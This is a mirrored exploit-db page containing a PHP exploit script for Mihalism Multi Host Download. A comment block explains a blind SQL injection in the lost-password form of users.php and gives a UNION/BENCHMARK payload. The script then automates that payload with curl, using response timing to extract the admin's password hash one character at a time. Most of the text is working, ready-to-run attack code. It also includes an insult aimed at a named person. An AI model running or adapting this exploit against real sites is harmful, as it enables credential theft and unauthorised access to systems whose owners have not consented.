bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/5074.php
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

126 lines
5.1 KiB
PHP
Executable file
Raw Blame History

<?php
/*
###############################################################################
#
# Moubik ( Romanian Security Team - http://rstzone.org ) presents
#
# Mihalism Multi Host Download - Blind SQL Injection Attack
#
# Thanks to Vladii for telling me about the CMS.
# Thanks to Shocker for telling Vladii about the CMS.
#
#
# Shoutz to Kw3rln, Bankai, Slick, Nemessis
# Visit http://rstzone.org
# Visit http://websecurity.ro
#
# Ride as high as possible
#
#
# Vulnerable Code is everywhere.
# I'll talk about users.php
#
###############################################################################*
We have the code
Line 107:
$DB->query("SELECT * FROM `".SQL_USERS_TABLE."` WHERE `user_name` = '".$_POST['user_name']."'");
Line 112:
$DB->query("INSERT INTO `".SQL_USERS_TABLE."` VALUES('', '".$_POST['user_name']."', '".md5($_POST['user_pass_1'])."', '', '".$_SERVER['REMOTE_ADDR']."', '".$_POST['user_email']."', '".$_POST['private']."', '".time()."', 'NORMAL', '".$_POST['country']."', '".$dob."', '".$_POST['gender']."')");
............
I'll create the query for lost password.
Click "Lost Password" and enter the SQL Injection in Username. The email address you could just leave it empty
Injection:
' UNION SELECT IF ( SUBSTRING(password,1,1) = '1', BENCHMARK(2000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12 from mmh_user_data where user_id='1
The password is saved in hashed form so you only search for 0..9, a..f and you have the admin's hash
This vulnerable code is:
$DB->query("SELECT * FROM `".SQL_USERS_TABLE."` WHERE `user_name` = '{$_POST['username']}'");
So the query becomes:
SELECT * FROM `mmh_user_data` WHERE `user_name` = '' UNION SELECT IF ( SUBSTRING(password,1,1) = '1', BENCHMARK(20000000, ENCODE('a','b')), 1 )
,2,3,4,5,6,7,8,9,10,11,12 from mmh_user_data where user_id='1'
Delay-ing the response if the first character of the admin's hash is equal to '1'
*/
function goto_help()
{
echo "-----------------------------------------------------------------------------------------\n";
echo "* Usage php ". $argv[0] ." [full_link] [userid] \n";
echo "* example:\n";
echo "* php ". $argv[0] ." http://localhost/multihost/users.php?act=lost_password_go 1 \n";
echo "-----------------------------------------------------------------------------------------\n";
exit();
}
$chars = array('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'b', 'c', 'd', 'e', 'f');
$host = $argv[1];
$userid = (empty($argv[2]) == true ? 1 : $argv[2]);
if (empty ($argv[1]))
{
goto_help();
}
echo "---------------------------------------------------\n";
echo "Starting to exploit $host\n";
echo "Userid exploited is $userid\n";
echo "---------------------------------------------------\n";
$hash = "";
$conn = curl_init();
curl_setopt($conn, CURLOPT_POST, true);
curl_setopt($conn, CURLOPT_URL, $host);
curl_setopt($conn, CURLOPT_RETURNTRANSFER, true);
for ($length = 1 ; $length <= 32 ; $length++)
{
for ($char = 0 ; $char <= 16 ; $char++)
{
$query = "' UNION SELECT IF ( SUBSTRING(password,". $length .",1) = '". $chars[$char] ."', BENCHMARK(20000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12 from mmh_user_data where user_id='". $userid;
//echo $query ."\n";
$start = time(); $end = $start;
curl_setopt($conn, CURLOPT_POSTFIELDS, 'username='. urlencode($query) .'&user_email=1');
curl_exec( $conn );
$end = time();
//if we have a hit
if (($end - $start) > 5)
{
echo "possible hit for ". $chars[$char] ."\n";
$hash .= $chars[$char];
break;
}
else
{
echo $chars[$char]. " ";
}
}
}
echo "---------------------------------------------------\n";
echo "* Exploit made by Moubik\n";
echo "* Romanian Security Zone - http://rstzone.org/\n";
echo "* esc6 esti un retardat\n";
echo "---------------------------------------------------\n";
echo "* Hash found for userid=". $userid . "\n";
echo "* hash=". $hash . "\n";
echo "---------------------------------------------------\n";
?>
# milw0rm.com [2008-02-06]
Reference in a new issue View git blame Copy permalink